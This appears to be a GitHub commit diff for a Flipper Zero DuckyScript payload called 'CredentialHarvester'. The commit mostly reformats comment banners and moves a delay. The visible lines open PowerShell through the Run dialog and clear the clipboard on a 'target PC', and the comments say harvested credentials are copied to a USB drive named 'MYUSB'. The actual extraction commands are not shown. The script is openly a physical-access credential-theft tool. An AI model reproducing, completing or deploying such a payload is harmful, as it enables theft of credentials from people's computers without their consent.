Update 0. CredentialHarvester

This commit is contained in:
Mark
2024-05-15 10:59:04 -04:00
committed by GitHub
parent 9937768673
commit 6911b05153
+8 -6
View File
@@ -1,11 +1,13 @@
REM This script was created by github.com/markcyber
REM This script requires a secondary USB named "MYUSB" to save credentials to
REM The extracted data will require decryption
REM ##############################################################################################################
REM ################# This script was created by github.com/markcyber #############
REM ################# This script requires a secondary USB named "MYUSB" to save credentials to #############
REM ################# The extracted data will require decryption #############
REM ################# Set delay for Flipper Zero #############
REM ##############################################################################################################
REM Set delay for Flipper Zero
DELAY 1000
REM Open PowerShell with elevated privileges
DELAY 1000
GUI r
DELAY 500
STRING powershell
@@ -49,7 +51,7 @@ STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC)
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off | clip
ENTER
DELAY 500